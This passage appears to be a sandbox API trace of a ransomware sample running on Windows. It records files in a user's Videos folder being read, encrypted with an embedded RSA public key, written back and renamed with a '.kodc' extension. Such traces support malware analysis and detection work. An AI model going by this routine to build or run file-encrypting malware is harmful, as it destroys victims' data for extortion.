lpMem=0x9bb7b30 | out: hHeap=0x630000) returned 1 [0099.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b00 | out: hHeap=0x630000) returned 1 [0099.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ae8 | out: hHeap=0x630000) returned 1 [0099.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c190 | out: hHeap=0x630000) returned 1 [0099.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.984] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0x2df8, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x2df8, lpOverlapped=0x0) returned 1 [0099.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0099.984] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x2dfd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.984] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0099.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0099.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0099.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.985] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.985] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.985] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.985] CloseHandle (hObject=0x5cc) returned 1 [0099.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0099.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0099.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0099.986] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6dK25uRTDl.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6dk25urtdl.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6dK25uRTDl.swf.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6dk25urtdl.swf.kodc")) returned 1 [0099.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.987] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.988] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40c97910, ftCreationTime.dwHighDateTime=0x1d5be59, ftLastAccessTime.dwLowDateTime=0xf9740a30, ftLastAccessTime.dwHighDateTime=0x1d5c5e2, ftLastWriteTime.dwLowDateTime=0xf9740a30, ftLastWriteTime.dwHighDateTime=0x1d5c5e2, nFileSizeHigh=0x0, nFileSizeLow=0x18d16, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7vpzR.mkv", cAlternateFileName="")) returned 1 [0099.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.988] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7vpzR.mkv") returned=".mkv" [0099.988] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\7vpzR.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\7vpzr.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.988] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=101654) returned 1 [0099.988] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.991] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x18cf0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.991] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.992] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.992] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.992] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x18d16, lpOverlapped=0x0) returned 1 [0099.993] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.993] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.993] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.993] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.994] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.994] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.994] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.994] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.994] GetLastError () returned 0x0 [0099.994] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.994] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.994] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.994] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.994] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18d20) returned 0x9bb8968 [0099.995] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c190 [0099.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ae8 [0099.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c1d8 [0099.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b00 [0099.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b30 [0099.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0099.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b48 [0099.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.996] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b30 | out: hHeap=0x630000) returned 1 [0099.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b48 | out: hHeap=0x630000) returned 1 [0099.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0099.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0099.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0099.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7b48 [0099.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7b30 [0099.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0099.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0099.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0099.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b48 | out: hHeap=0x630000) returned 1 [0099.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b30 | out: hHeap=0x630000) returned 1 [0099.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0099.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.997] GetCurrentThreadId () returned 0x42c [0099.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba6278 [0099.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.997] GetCurrentThreadId () returned 0x42c [0099.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0099.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b30 [0099.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0099.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b48 [0099.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b18 [0099.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0099.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0099.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0099.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7b60 [0099.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a10 [0099.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0099.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b30 | out: hHeap=0x630000) returned 1 [0099.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b30 [0099.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0099.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0099.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0099.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0099.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0099.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b30 | out: hHeap=0x630000) returned 1 [0099.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.999] HeapFree (in: 